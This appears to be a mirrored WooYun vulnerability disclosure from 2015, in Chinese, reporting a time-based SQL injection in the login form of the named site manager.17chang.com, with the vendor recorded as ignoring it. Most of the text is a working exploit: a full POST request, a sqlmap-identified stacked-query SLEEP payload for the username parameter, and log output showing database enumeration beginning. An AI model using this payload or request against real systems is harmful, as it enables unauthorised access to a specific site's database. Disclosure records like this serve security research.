乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
23333
POST数据包:
POST /login HTTP/1.1Host: manager.17chang.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://manager.17chang.com/X-Forwarded-For: 8.8.8.8'Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 114user%5Busername%5D=admin&user%5Bpassword%5D=123456&user%5Brememberme%5D=31536000000&loginsubmit=%E7%99%BB%E5%BD%95
user[username] 参数可注入
24库 基于时间的注入 跑起来太慢了 就不跑了
POST parameter 'user[username]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 79 HTTP(s) requests:---Parameter: user[username] (POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: user[username]=admin';(SELECT * FROM (SELECT(SLEEP(5)))CybG)#&user[password]=123456&user[rememberme]=31536000000&loginsubmit=%E7%99%BB%E5%BD%95---[13:28:15] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11[13:28:15] [INFO] fetching database names[13:28:15] [INFO] fetching number of databases[13:28:15] [INFO] retrieved:[13:28:15] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y2[13:28:41] [INFO] adjusting time delay to 4 seconds due to good response times4[13:28:41] [INFO] retrieved: infor[13:30:33] [ERROR] invalid character detected. retrying..[13:30:33] [WARNING] increasing time delay to 5 secondsmation_
危害等级:无影响厂商忽略
忽略时间:2015-11-22 13:28
漏洞Rank:4 (WooYun评价)
暂无